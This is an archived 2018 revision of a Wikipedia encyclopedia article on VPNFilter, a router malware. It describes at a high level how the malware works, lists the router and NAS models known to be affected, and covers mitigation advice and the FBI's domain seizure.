Jump to content

VPNFilter

From Wikipedia, the free encyclopedia
This is an old revision of this page, as edited by Eapender (talk | contribs) at 15:44, 26 June 2018 (Add additional details about stage 1, reduce generality of existing text). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

VPNFilter is malware designed to infect routers. As of 24 May 2018, it is estimated to have infected approximately 500,000 routers worldwide, though the number of at-risk devices is larger[1]. It can steal data, contains a "kill switch" designed to disable the infected router on command, and is able to persist should the user reboot the router.[2] The FBI believes that it was created by the Russian Fancy Bear group.[3][4]

Operation

VPNFilter is malware infecting a number of different kinds of network routers and storage devices. It seems to be designed in part to target serial networking devices using the Modbus protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems using SCADA.[5]

The initial infection vector is still unknown. The CICSO Talos security group hypothesizes the malware exploits known router security vulnerabilities to infect devices[6].

This software installs itself in multiple stages:

  1. Stage 1 involves a worm which adds code to the device's crontab (the list of tasks run at regular intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.[7]
  2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
  3. Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure "dark web" Tor software to communicate via encryption.[5]

What it does

VPNFilter uses multiple third stage operations after the initial infection. One such function of VPNFilter is to sniff network data on a network connected to the infected device, and gather credentials, supervisory control and data. The data are then encrypted and exfiltrated via the Tor network.

It can also serve as a relay point to hide the origin of subsequent attacks.

Mitigation

Both Cisco and Symantec suggest that people who own affected devices do a factory reset. That is typically accomplished by using a small, pointed object, such as a straightened out paperclip, to push the small reset button on the back on the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but also restores the router to all original settings. If the router has remote management enabled, a factory reset will often disable this (the default setting of many routers). Remote management is thought to be one possible vector for the initial attack.

Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection[8].

Devices at Risk

The initial worm that installs VPNFilter can only attack devices running embedded firmware based on Busybox on Linux compiled only for specific processors. This does not include non-embedded Linux devices such as workstations and servers.[9]

Manufacturer-provided firmware on the following router models is known to be at risk:[10][7]

Asus Devices:

  • RT-AC66U
  • RT-N10
  • RT-N10E
  • RT-N10U
  • RT-N56U
  • RT-N66U

D-Link Devices:

  • DES-1210-08P
  • DIR-300
  • DIR-300A
  • DSR-250N
  • DSR-500N
  • DSR-1000
  • DSR-1000N

Huawei Devices:

  • HG8245

Linksys Devices:

  • E1200
  • E2500
  • E3000
  • E3200
  • E4200
  • RV082
  • WRVS4400N

Mikrotik Devices:

  • CCR1009
  • CCR1016
  • CCR1036
  • CCR1072
  • CRS109
  • CRS112
  • CRS125
  • RB411
  • RB450
  • RB750
  • RB911
  • RB921
  • RB941
  • RB951
  • RB952
  • RB960
  • RB962
  • RB1100
  • RB1200
  • RB2011
  • RB3011
  • RB Groove
  • RB Omnitik
  • STX5
  • Mikrotik RouterOS versions up to 6.38.5 on current or 6.37.5 on bugfix release chains[11]

Netgear Devices:

  • DG834
  • DGN1000
  • DGN2200
  • DGN3500
  • FVS318N
  • MBRN3000
  • R6400
  • R7000
  • R8000
  • WNR1000
  • WNR2000
  • WNR2200
  • WNR4000
  • WNDR3700
  • WNDR4000
  • WNDR4300
  • WNDR4300-TN
  • UTM50

QNAP Devices:

  • TS251
  • TS439 Pro
  • Other QNAP NAS devices running QTS software

TP-Link Devices:

  • R600VPN
  • TL-WR741ND
  • TL-WR841N

Ubiquiti Devices:

  • NSM2
  • PBE M5

Upvel Devices:

ZTE Devices:

  • ZXHN H108N

Epidemiology

VPNFilter is described by Cisco Talos as having infected as many as 500,000 devices worldwide,[9] in perhaps 54 different countries, though proportionately the focus has been on Ukraine.

FBI investigation

The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall.com as ostensibly having been used to redirect queries from stage 1 of the malware, allowing it to locate and install copies of stages 2 and 3.[4]

Encouraging attempted reinfection

On 25 May 2018, the FBI suggested instead that users simply reboot their routers. This would temporarily remove the dangerous payload of the malware, but leave it infected with Stage 1, leading it to try re-downloading the payload, infecting the router again. The FBI said that this would help them to find the servers distributing the payload.[12][13][3]

Notes

  1. ^ Malware targeting Upvel as a vendor has been discovered, but we[who?] are unable to determine which specific device it is targeting.

References

  1. ^ "VPNFilter Update and Our First Summit Recap". Talos. 2018-06-21. Retrieved 2018-06-26.
  2. ^ "VPNFilter state-affiliated malware pose lethal threat to routers". SlashGear. 2018-05-24. Retrieved 2018-05-31.
  3. ^ a b Kevin Poulsen (23 May 2018). "Exclusive: FBI Seizes Control of Russian Botnet". Daily Beast.
  4. ^ a b FBI to all router users: Reboot now to neuter Russia's VPNFilter malware
  5. ^ a b VPNFilter: New Router Malware with Destructive Capabilities
  6. ^ "VPNFilter, the Unfiltered Story". Talos. 2018-05-29. Retrieved 2018-06-26.
  7. ^ a b William Largent (6 June 2018). "VPNFilter Update - VPNFilter exploits endpoints, targets new devices".
  8. ^ "Security Advisory for VPNFilter Malware on Some NETGEAR Devices". Netgear. 2018-06-06. Retrieved 2018-06-26.
  9. ^ a b "Hackers infect 500,000 consumer routers all over the world with malware". Ars Technica. Retrieved 2018-05-31.
  10. ^ "VPNFilter: New Router Malware with Destructive Capabilities". Retrieved 2018-05-31.
  11. ^ "VPNfilter official statement - MikroTik". forum.mikrotik.com. Retrieved 2018-05-31.
  12. ^ Dan Goodin (25 May 2018). "FBI tells router users to reboot now to kill malware infecting 500k devices". Ars Technica.
  13. ^ Dan Goodin (24 May 2018). "Hackers infect 500,000 consumer routers all over the world with malware". Ars Technica.
Retrieved from "https://en.wikipedia.org/w/index.php?title=VPNFilter&oldid=847610506"